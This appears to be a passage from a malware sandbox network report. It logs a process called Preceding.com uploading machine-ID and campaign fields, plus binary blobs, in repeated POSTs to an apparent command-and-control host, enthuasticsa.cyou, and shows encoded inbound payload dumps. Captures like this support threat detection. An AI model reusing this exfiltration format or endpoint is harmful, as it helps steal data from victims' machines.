66 4d 6d Data Ascii: UZ3USS+LqvQ7oM8luMld5BkpFORkeglly7XbfyKdbVOlCcQ5i34uwYgAvpRZaXwE3VhglYCKCSGuwe/7Bn1M51D91jmrvh+x2ZT/wEgNjJS5LWQFkJppcc8RW09SLB3TxakEOHsu3sEI8F6UWTnMNK1I4AH0nnnQSjRf/dIsPROUHfecqnrPZQjwOjEtmQy0TRhQ9cD6yIHPEbsvs11dM7XZ5RgLbk7BmDBuZNndiAB9WWQAdHhpcX7xeo/mfMm
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 52 68 72 4c 6b 34 42 32 45 54 36 30 4b 6e 6f 43 4f 48 35 4b 6b 41 30 73 45 72 64 67 70 34 42 4f 78 2b 54 47 54 79 58 74 4f 33 55 53 47 2b 4c 71 76 48 59 6b 48 35 56 69 57 6c 63 31 4a 33 49 45 46 55 41 2b 6e 6d 68 48 6d 47 62 54 31 4a 4e 37 53 4a 31 32 64 53 34 2b 35 36 4f 56 51 78 6b 2f 6b 55 74 6e 41 6a 6e 62 46 68 55 4a 71 42 4b 6d 55 47 2f 56 64 6f 4c 41 2b 6b 39 45 35 46 38 55 44 68 37 44 6e 36 68 2b 4a 42 65 31 50 6b 35 54 47 53 64 47 63 44 31 73 48 71 35 49 57 37 68 4f 37 39 69 37 59 33 54 4e 58 6e 45 6e 4b 39 71 4c 6f 43 4d 68 58 6f 33 36 65 6c 4d 4e 49 6b 4c 73 44 55 51 6d 67 6a 46 7a 38 55 36 61 2b 49 4e 2b 57 62 52 65 52 53 6f 71 7a 36 4f 73 51 6a 77 4c 6d 53 5a 36 62 77 30 44 59 67 41 64 62 43 36 36 58 47 75 4d 61 75 2f 73 31 31 74 38 35 57 39 Data Ascii: RhrLk4B2ET60KnoCOH5KkA0sErdgp4BOx+TGTyXtO3USG+LqvHYkH5ViWlc1J3IEFUA+nmhHmGbT1JN7SJ12dS4+56OVQxk/kUtnAjnbFhUJqBKmUG/VdoLA+k9E5F8UDh7Dn6h+JBe1Pk5TGSdGcD1sHq5IW7hO79i7Y3TNXnEnK9qLoCMhXo36elMNIkLsDUQmgjFz8U6a+IN+WbReRSoqz6OsQjwLmSZ6bw0DYgAdbC66XGuMau/s11t85W9
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 6f 76 42 65 6b 55 2f 6b 52 74 6e 41 6a 6b 37 62 6e 41 35 52 44 71 71 63 46 4f 51 54 73 76 55 68 32 4e 45 79 55 5a 42 4c 68 37 33 68 37 68 53 43 48 65 42 42 6b 35 58 45 42 35 7a 4f 42 30 64 48 2f 39 6f 37 37 7a 53 76 35 54 58 46 6c 69 6f 5a 68 41 4f 4e 74 4b 4b 33 55 49 73 41 36 6b 57 52 6b 4d 46 49 31 6f 41 47 57 51 71 69 6c 52 62 78 46 62 48 7a 4c 4e 7a 64 4a 31 65 51 52 34 61 38 36 75 51 61 79 45 47 6a 54 59 48 59 6c 67 66 6e 67 77 39 66 42 4c 48 61 41 36 30 45 2f 2f 6b 72 6b 34 35 31 57 35 4e 44 68 62 54 75 35 42 69 4a 41 2b 31 4e 6e 4a 48 47 54 38 43 50 42 46 63 47 71 5a 55 64 35 78 69 36 2b 69 44 58 30 44 6f 58 30 77 4f 4e 6f 4b 4b 33 55 4b 63 6f 31 67 69 34 6f 6f 35 59 6e 4a 64 41 57 41 76 6e 77 6c 7a 76 48 72 50 32 4b 4e 58 66 4f 56 32 55 53 49 61 Data Ascii: ovBekU/kRtnAjk7bnA5RDqqcFOQTsvUh2NEyUZBLh73h7hSCHeBBk5XEB5zOB0dH/9o77zSv5TXFlioZhAONtKK3UIsA6kWRkMFI1oAGWQqilRbxFbHzLNzdJ1eQR4a86uQayEGjTYHYlgfngw9fBLHaA60E//krk451W5NDhbTu5BiJA+1NnJHGT8CPBFcGqZUd5xi6+iDX0DoX0wONoKK3UKco1gi4oo5YnJdAWAvnwlzvHrP2KNXfOV2USIa
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 34 77 4b 37 45 75 59 6e 74 78 41 32 35 77 4f 55 67 69 76 6b 68 58 69 47 62 72 7a 49 64 2f 63 4e 46 43 54 54 59 4c 34 72 4b 38 58 6b 45 2b 37 43 72 69 49 31 56 58 45 67 79 46 53 43 4f 65 46 55 76 70 64 75 50 4a 6e 69 35 59 38 52 5a 6c 4f 6d 4c 48 6c 34 52 2b 4c 48 65 4a 48 6b 6f 72 4a 53 4e 61 4a 44 46 6b 49 6f 5a 73 5a 36 52 47 34 2b 79 7a 63 32 6e 55 5a 33 55 53 53 2b 4c 71 76 50 6f 4d 63 39 45 6d 58 6b 39 68 63 6b 70 46 4f 52 6b 65 67 6c 6c 79 37 58 62 7a 31 4c 4e 66 57 4f 56 65 5a 54 6f 71 71 37 65 67 58 67 51 54 78 51 4a 36 66 78 55 2f 5a 67 51 5a 4e 43 36 6d 49 47 66 45 50 2f 37 42 6e 31 4d 35 31 44 39 31 31 6a 61 6a 79 37 46 4b 35 47 65 42 63 6b 70 58 43 42 38 33 41 47 52 38 41 71 39 70 45 6f 78 75 77 39 79 54 63 31 7a 78 62 6b 45 61 44 76 65 50 70 Data Ascii: 4wK7EuYntxA25wOUgivkhXiGbrzId/cNFCTTYL4rK8XkE+7CriI1VXEgyFSCOeFUvpduPJni5Y8RZlOmLHl4R+LHeJHkorJSNaJDFkIoZsZ6RG4+yzc2nUZ3USS+LqvPoMc9EmXk9hckpFORkeglly7Xbz1LNfWOVeZToqq7egXgQTxQJ6fxU/ZgQZNC6mIGfEP/7Bn1M51D911jajy7FK5GeBckpXCB83AGR8Aq9pEoxuw9yTc1zxbkEaDvePp
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 46 4a 67 74 6a 52 43 63 76 4f 42 31 4e 48 2f 39 6f 66 35 42 36 2b 39 43 37 66 32 54 4a 54 6a 30 6d 4e 71 75 50 75 47 34 55 44 34 30 65 55 6b 73 39 4f 33 34 49 4e 57 41 43 6f 6e 31 79 74 58 62 6a 6d 5a 34 75 57 46 46 71 57 54 39 48 69 6f 76 42 65 6b 55 2f 6b 52 74 6e 41 6a 6b 66 59 69 77 70 53 42 4b 69 5a 44 75 49 62 72 66 34 71 32 63 51 2f 58 4a 68 4f 68 37 58 68 36 52 61 44 41 2f 46 44 6d 5a 76 46 42 35 7a 4f 42 30 64 48 2f 39 6f 2f 39 41 75 31 2b 53 76 46 33 54 52 55 69 30 36 61 2b 4b 79 76 41 59 38 65 6f 78 4b 50 69 4e 6c 41 7a 63 41 5a 48 77 43 72 32 6b 53 6a 47 37 62 34 49 4e 58 59 4a 31 4b 62 54 49 57 78 36 2b 73 59 69 77 2f 6e 54 70 36 64 7a 55 76 5a 69 51 4e 51 41 36 36 55 46 65 78 64 38 62 34 67 79 35 5a 74 46 37 78 59 69 62 54 76 72 77 2f 47 46 Data Ascii: FJgtjRCcvOB1NH/9of5B6+9C7f2TJTj0mNquPuG4UD40eUks9O34INWACon1ytXbjmZ4uWFFqWT9HiovBekU/kRtnAjkfYiwpSBKiZDuIbrf4q2cQ/XJhOh7Xh6RaDA/FDmZvFB5zOB0dH/9o/9Au1+SvF3TRUi06a+KyvAY8eoxKPiNlAzcAZHwCr2kSjG7b4INXYJ1KbTIWx6+sYiw/nTp6dzUvZiQNQA66UFexd8b4gy5ZtF7xYibTvrw/GF
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 59 79 56 2b 53 31 6b 42 2f 44 4c 47 66 47 2f 56 66 69 76 30 70 33 64 45 6a 46 34 4a 38 78 50 6a 6a 72 30 69 78 46 71 4e 63 32 63 43 63 43 5a 4b 63 51 41 64 48 34 4a 6b 4f 38 52 75 38 36 43 53 55 36 41 74 77 69 30 6d 4e 71 4f 58 34 48 38 68 42 6f 30 58 5a 77 50 63 48 32 34 6b 62 54 68 47 71 69 68 75 6a 49 76 47 2b 50 35 4f 4f 64 57 4b 65 54 59 53 2f 39 50 35 64 72 78 6e 70 54 59 6d 66 32 55 69 53 77 45 42 5a 52 2f 2f 4a 55 71 4d 5a 72 72 35 2f 67 34 52 75 41 73 34 55 32 75 72 39 6f 51 6e 49 47 61 4d 53 79 39 61 4f 56 5a 4c 57 51 42 67 45 74 59 67 61 34 41 75 38 75 52 6e 74 38 53 39 61 6d 31 53 62 68 74 7a 6f 43 6f 55 4a 39 46 76 56 6a 63 31 4a 33 49 6b 57 48 30 6e 6e 6c 56 79 37 4a 50 2b 32 5a 2b 79 59 64 55 2f 64 47 38 71 4e 34 65 45 65 6a 78 6e 79 42 37 Data Ascii: YyV+S1kB/DLGfG/Vfiv0p3dEjF4J8xPjjr0ixFqNc2cCcCZKcQAdH4JkO8Ru86CSU6Atwi0mNqOX4H8hBo0XZwPcH24kbThGqihujIvG+P5OOdWKeTYS/9P5drxnpTYmf2UiSwEBZR//JUqMZrr5/g4RuAs4U2ur9oQnIGaMSy9aOVZLWQBgEtYga4Au8uRnt8S9am1SbhtzoCoUJ9FvVjc1J3IkWH0nnlVy7JP+2Z+yYdU/dG8qN4eEejxnyB7
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 6e 4d 34 53 48 31 2f 6e 33 52 2f 78 44 37 6e 39 4d 64 43 52 43 32 6d 36 54 59 32 35 39 50 38 48 68 7a 48 64 58 35 71 57 77 45 44 45 6e 30 41 52 52 36 6a 61 52 4e 70 64 39 37 34 59 6e 5a 59 74 46 38 55 44 76 37 76 73 34 52 65 65 48 71 35 74 6c 35 2f 50 55 63 4b 5a 44 78 39 4a 35 35 78 63 75 30 2f 78 76 69 50 43 6c 6d 30 48 7a 78 6a 66 36 37 57 2f 51 70 64 42 2b 67 71 50 32 4a 59 56 6e 4d 34 53 48 31 2f 6e 33 52 2f 78 44 37 6e 39 4d 64 43 52 43 32 6d 36 54 59 32 35 39 50 38 48 68 30 44 4e 66 4c 69 6d 38 46 4c 52 67 41 35 59 45 62 62 61 55 71 4d 53 2f 36 59 65 6b 35 35 31 61 4e 4d 44 6b 76 69 36 72 79 57 4c 41 65 31 4e 6a 34 6d 44 59 4e 79 4a 41 55 6b 58 73 4a 56 54 7a 53 75 65 76 6d 6d 54 30 48 55 50 7a 77 33 4b 76 50 4f 76 53 4e 68 64 75 42 2f 4b 7a 35 34 Data Ascii: nM4SH1/n3R/xD7n9MdCRC2m6TY259P8HhzHdX5qWwEDEn0ARR6jaRNpd974YnZYtF8UDv7vs4ReeHq5tl5/PUcKZDx9J55xcu0/xviPClm0Hzxjf67W/QpdB+gqP2JYVnM4SH1/n3R/xD7n9MdCRC2m6TY259P8Hh0DNfLim8FLRgA5YEbbaUqMS/6Yek551aNMDkvi6ryWLAe1Nj4mDYNyJAUkXsJVTzSuevmmT0HUPzw3KvPOvSNhduB/Kz54
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 68 38 66 35 38 4a 63 7a 67 2b 34 37 69 53 54 6d 48 56 62 33 52 76 4b 74 66 44 6f 41 49 74 44 35 46 43 65 32 4e 45 4a 79 38 34 57 48 31 2f 30 31 46 7a 78 58 65 65 2b 59 4e 33 62 4e 46 53 54 51 4a 69 71 35 4f 77 47 69 30 6a 64 64 4c 53 4b 79 56 66 52 7a 44 46 53 41 37 47 50 48 2f 4d 61 67 63 41 4b 77 64 45 6c 56 4e 39 76 6a 62 58 75 30 53 36 2f 48 75 52 61 32 37 37 4e 55 64 48 4f 54 68 38 66 35 38 4a 63 7a 67 2b 34 37 69 53 52 2b 6a 4a 61 6b 51 4f 56 39 76 75 76 42 73 68 58 73 41 54 5a 69 6f 34 66 6b 73 6b 44 54 52 57 68 6d 51 72 67 57 6f 48 41 43 73 48 52 4a 56 54 66 63 6f 65 38 39 50 6f 54 6d 41 6a 64 64 4c 53 4b 79 56 66 52 7a 43 56 6c 52 5a 61 4d 48 2b 4d 54 75 4c 35 70 6b 38 35 31 44 39 31 75 6d 4c 2f 79 37 46 4b 74 4e 61 46 37 6a 35 76 4f 53 64 58 4f Data Ascii: h8f58Jczg+47iSTmHVb3RvKtfDoAItD5FCe2NEJy84WH1/01FzxXee+YN3bNFSTQJiq5OwGi0jddLSKyVfRzDFSA7GPH/MagcAKwdElVN9vjbXu0S6/HuRa277NUdHOTh8f58Jczg+47iSR+jJakQOV9vuvBshXsATZio4fkskDTRWhmQrgWoHACsHRJVTfcoe89PoTmAjddLSKyVfRzCVlRZaMH+MTuL5pk851D91umL/y7FKtNaF7j5vOSdXO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49986	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:28 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8ZBD8UAEIX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12809 Host: enthuasticsa.cyou
2025-01-10 22:37:28 UTC	12809	OUT	Data Raw: 2d 2d 38 5a 42 44 38 55 41 45 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 36 39 36 39 37 39 30 37 44 46 34 44 34 34 38 31 36 37 30 33 33 42 42 33 30 33 38 35 37 0d 0a 2d 2d 38 5a 42 44 38 55 41 45 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 5a 42 44 38 55 41 45 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 38 5a 42 44 38 55 41 45 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --8ZBD8UAEIXContent-Disposition: form-data; name="hwid"E6A69697907DF4D448167033BB303857--8ZBD8UAEIXContent-Disposition: form-data; name="pid"2--8ZBD8UAEIXContent-Disposition: form-data; name="lid"hRjzG3--DNO--8ZBD8UAEIXContent-Di
2025-01-10 22:37:29 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9hv666sjhopf7renjrbe5i0be0; expires=Tue, 06 May 2025 16:24:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOczJK4dbTeHv2%2Bmh9Vwhq%2F1paDg%2BdJc9kF5dO2dKV0fFOvrN%2FmCZctsc8NC8qiQnpnfvh%2FPUXpzzS7XNsBF8eAMyZJjty2cMNWSNUzWaNoQz4TYeI5D5gRCrMId%2FpmD4JvMeQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026df68d543c9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1607&rtt_var=611&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13742&delivery_rate=1780487&cwnd=232&unsent_bytes=0&cid=da4d3749779904bc&ts=974&x=0"
2025-01-10 22:37:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:37:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49987	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:30 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=445E830SWF5U7V User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15079 Host: enthuasticsa.cyou
2025-01-10 22:37:30 UTC	15079	OUT	Data Raw: 2d 2d 34 34 35 45 38 33 30 53 57 46 35 55 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 36 39 36 39 37 39 30 37 44 46 34 44 34 34 38 31 36 37 30 33 33 42 42 33 30 33 38 35 37 0d 0a 2d 2d 34 34 35 45 38 33 30 53 57 46 35 55 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 34 35 45 38 33 30 53 57 46 35 55 37 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 34 34 35 45 38 33 30 53 57 46 Data Ascii: --445E830SWF5U7VContent-Disposition: form-data; name="hwid"E6A69697907DF4D448167033BB303857--445E830SWF5U7VContent-Disposition: form-data; name="pid"2--445E830SWF5U7VContent-Disposition: form-data; name="lid"hRjzG3--DNO--445E830SWF
2025-01-10 22:37:30 UTC	1140	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qodhi6ek0b3obnk29i9ujrl4d3; expires=Tue, 06 May 2025 16:24:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2F592lZP6ndEIczIFn1Tc94EHWwEtCil5VDBrEbiYaJ9ZSb0GjxmiZmh4mCT0fHJ%2F4b9%2FJW%2BYi5Api7nVyKB7g9v%2Fv1G3jO07B%2BuoKfi%2B0o1z9ocWOaX%2B9rmlOz9bWmmRuQVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026e938320f70-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1586&rtt_var=607&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2841&recv_bytes=16016&delivery_rate=1783750&cwnd=212&unsent_bytes=0&cid=9b1176dc2158c466&ts=500&x=0"
2025-01-10 22:37:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:37:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49988	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:31 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FRXO5VY72MCJBL8Y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19949 Host: enthuasticsa.cyou
2025-01-10 22:37:31 UTC	15331	OUT	Data Raw: 2d 2d 46 52 58 4f 35 56 59 37 32 4d 43 4a 42 4c 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 36 39 36 39 37 39 30 37 44 46 34 44 34 34 38 31 36 37 30 33 33 42 42 33 30 33 38 35 37 0d 0a 2d 2d 46 52 58 4f 35 56 59 37 32 4d 43 4a 42 4c 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 52 58 4f 35 56 59 37 32 4d 43 4a 42 4c 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 46 52 58 4f Data Ascii: --FRXO5VY72MCJBL8YContent-Disposition: form-data; name="hwid"E6A69697907DF4D448167033BB303857--FRXO5VY72MCJBL8YContent-Disposition: form-data; name="pid"3--FRXO5VY72MCJBL8YContent-Disposition: form-data; name="lid"hRjzG3--DNO--FRXO
2025-01-10 22:37:31 UTC	4618	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2025-01-10 22:37:32 UTC	1135	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0pslne7vevqg07kp01vg2cdt4q; expires=Tue, 06 May 2025 16:24:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ln2me8Ez1AOqCcj01eJyI3CYKvot7Xr72CIfI7vy78W8nRppj9HSuYBpBQekQ%2B2gOyLZATy3%2Fndxb6bsxmUOFjVFzgYqt6lpBsHljmRp%2F6lz3hXAQm5c0Nfoz4%2FOPE7nDysgNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026f0fcf24262-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1733&rtt_var=668&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=20910&delivery_rate=1684939&cwnd=190&unsent_bytes=0&cid=74470d69a654a36b&ts=650&x=0"
2025-01-10 22:37:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:37:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49989	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:32 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DPMKPEZBNCRM78VQN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1211 Host: enthuasticsa.cyou
2025-01-10 22:37:32 UTC	1211	OUT	Data Raw: 2d 2d 44 50 4d 4b 50 45 5a 42 4e 43 52 4d 37 38 56 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 36 39 36 39 37 39 30 37 44 46 34 44 34 34 38 31 36 37 30 33 33 42 42 33 30 33 38 35 37 0d 0a 2d 2d 44 50 4d 4b 50 45 5a 42 4e 43 52 4d 37 38 56 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 50 4d 4b 50 45 5a 42 4e 43 52 4d 37 38 56 51 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 4e 4f 0d 0a 2d 2d 44 Data Ascii: --DPMKPEZBNCRM78VQNContent-Disposition: form-data; name="hwid"E6A69697907DF4D448167033BB303857--DPMKPEZBNCRM78VQNContent-Disposition: form-data; name="pid"1--DPMKPEZBNCRM78VQNContent-Disposition: form-data; name="lid"hRjzG3--DNO--D
2025-01-10 22:37:33 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r957o89j09326nkgnuqi1mrtth; expires=Tue, 06 May 2025 16:24:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HBpAsNM6G6MiY53YwXm56M7wBpqAVV2bLmtd2satJ24OMlXro5OresV%2B4owcuJARRBV3nq5X3imvvvPXju%2FQ4PgBp8xXbZlKZ92UKf7oG1%2FmsgnmkMAXP58LpCMStXJ4sq7GfQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026f91da24393-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1601&rtt_var=632&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2128&delivery_rate=1687861&cwnd=206&unsent_bytes=0&cid=0d8f21bebef1a061&ts=482&x=0"
2025-01-10 22:37:33 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:37:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49990	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:33 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1UB62AYVJE4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1085 Host: enthuasticsa.cyou
